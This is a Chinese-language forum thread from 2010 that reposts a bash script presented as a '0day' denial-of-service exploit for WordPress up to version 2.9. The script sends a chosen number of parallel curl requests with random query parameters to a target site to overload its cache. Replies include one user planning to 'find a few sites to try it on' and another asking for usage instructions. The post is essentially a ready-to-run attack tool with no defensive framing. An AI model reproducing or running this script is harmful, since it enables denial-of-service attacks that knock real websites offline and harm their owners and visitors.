标题:
0day Wordpress DOS <= 2.9
[打印本页]
作者:
柔肠寸断
时间:
2010-1-14 14:26
标题:
0day Wordpress DOS <= 2.9
#!/bin/bash
#
# Copyright (C) 2009 Emanuele Gentili < emgent@backtrack.it >
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
# WPd0s.sh
# This is a 0day DOS issue for Wordpress Core that use cache stressing with random
# parameter on multiple requests.
#
show_help(){
echo ""
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " --usage show the exploit Usage"
echo " --prereq show the exploit Prerequisites"
echo " --credits show the exploit Credits"
echo " --help show the Help"
echo ""
echo "Emanuele Gentili <emgent@backtrack.it>"
}
show_credits(){
echo ""
echo " Emanuele 'emgent' Gentili"
echo " http://www.backtrack.it/~emgent/"
echo " emgent @ backtrack.it"
echo ""
}
show_prereq(){
echo ""
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " Prerequeisites:"
echo " Bash (yeah because is cool.)"
echo " Curl"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}
show_usage(){
echo ""
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " usage $0 --host http://localhost/wordpress/ --requests 1000"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}
# Bash
while [[ $# != 0 ]]; do
arg_name=$1; shift
case "$arg_name" in
--help|-?|-h) show_help; exit 0;;
--credits) show_credits; exit 0;;
--usage) show_usage; exit 0;;
--prereq) show_prereq; exit 0;;
--host) host=$1; shift;;
--requests) requests=$1; shift;;
*) echo "invalid option: $1"; show_help;exit 1;;
esac
done
[ -z "$host" ] && { show_help; exit 1; }
for random in `seq 1 $requests`; do
curl -A Firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 &
done
# 2009-12-30 enJoy.
作者:
zxczxcxzc
时间:
2010-1-14 16:31
哇,0day。。。。。。。。。。
作者:
zxczxcxzc
时间:
2010-1-14 16:31
去找几个站试试看
作者:
gxp118
时间:
2010-1-14 23:21
1#
柔肠寸断
菜鸟完全看不懂!!
老大是不是可以给个中文利用方法
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2